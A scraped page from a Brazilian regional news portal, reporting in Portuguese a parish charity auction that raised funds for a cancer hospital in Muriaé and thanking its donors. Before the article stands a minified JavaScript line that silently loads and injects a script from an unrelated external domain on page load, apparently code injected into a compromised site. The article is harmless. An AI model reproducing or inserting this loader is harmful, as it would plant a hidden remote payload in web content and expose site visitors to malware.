;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 1° Leilão da Rezinha da Matriz em prol da Fundação Cristiano Varella foi um show de solidariedade. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

1° Leilão da Rezinha da Matriz em prol da Fundação Cristiano Varella foi um show de solidariedade.

O Hospital do Câncer de Muriaé da Fundação Cristiano Varella recebeu o privilégio de estrear as Rezinhas do mês de Maria da Igreja Matriz São Paulo, de Muriaé. O leilão, realizado na noite desta quinta-feira, contou com a presença de fieis que saíram da missa e de diversas autoridades municipais que se sensibilizam com a causa do Hospital e quiseram fazer sua parte na luta pela vida.

Foram leiloadas dezenas de prendas como pernis, leitoas, tortas doces e salgadas, chocolates, artesanatos, entre outras, e graças ao apoio e estímulo do leiloeiro Ailton Malta, além da solidariedade do público, o Hospital conseguiu arrecadar R$ 3.184,00 que serão revertidos em exames e medicamentos para nossos pacientes.

Nós, do Hospital do Câncer de Muriaé da Fundação Cristiano Varella, gostaríamos de agradecer muito pela generosidade de todos que compareceram e arremataram as prendas, à Comissão de Evento da Paróquia da Matriz São Paulo, a presidente da Comissão Graziela Porcaro, que cedeu esta noite para nosso Hospital, ao Ailton Malta por ter animado esse evento tão importante para todos nós e especialmente a todos que doaram prendas: aos colaboradores de todos os setores, ao Délcio Milani, Marília Andrade, Laticínios Miluza, Luísa Maria Rossi, José Antônio, Carmen Lúcia Varella, Itaqui Couros, O Boticário, Brownie da Mi, Eduardo Goulart, Sérgio Dias Henriques, José Alexandre Nascimento, Luísa Ribeiro Varella, Lael Varella, Deputado Federal Misael Varella, Deputado Estadual Wilson Batista, Luciano Varella, Dr. Marcus Mazzoni, Maria Angélica Mendonça, Associação dos Artesãos de Dom Silvério, Alveriana Eliana Fava, Bruno Licy e Fábio Luiz Oliveira.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.